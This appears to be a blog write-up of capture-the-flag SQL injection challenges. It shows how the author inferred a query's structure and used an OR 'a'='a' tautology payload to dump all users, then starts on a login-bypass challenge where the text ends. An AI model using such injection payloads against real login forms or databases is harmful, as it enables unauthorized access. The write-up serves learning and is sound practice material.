I have set myself the challenge of writing up the details of each challenge that I solve as a reminder to myself, as a reference and as a resource to help others on their CTF journeys. In this post I outline the first few SQL challenges I have completed and the rabbit holes it took me into along the way as the challenges get increasingly difficult.
ACL rulezzz the world
You are provided a simple drop down that submits a username variable to a vulnerable server.
Passing in a simple single quote yields a MySQL syntax error so that gives us a good starting point as to the syntax we should work with.
Using the built in functionality passing in a username returned three fields:
Assuming this the SQL query will be along the lines of
SELECT Username, Group, Description FROM <tablename> WHERE Username=’<INPUTNAME>’;
If we then modify the SQL syntax to return all of the users by matching with an OR query our syntax becomes:
`SELECT Username, Group, Description FROM <tablename> WHERE Username=’admin’ OR ‘a’=’a’
Note we do not add a trailing quote since it is already present within the SQL syntax. This evaluates the SQL to return the details for the username of admin and bypass the password.
Login portal 1
You are provided a simple username and password login form. I initially tested to see if there was any character filtering and passing = operator and comment tags — and # are filtered by the web app.
Since it is a login form it is straight forward to assume the likely SQL syntax and build a simple injection bypass.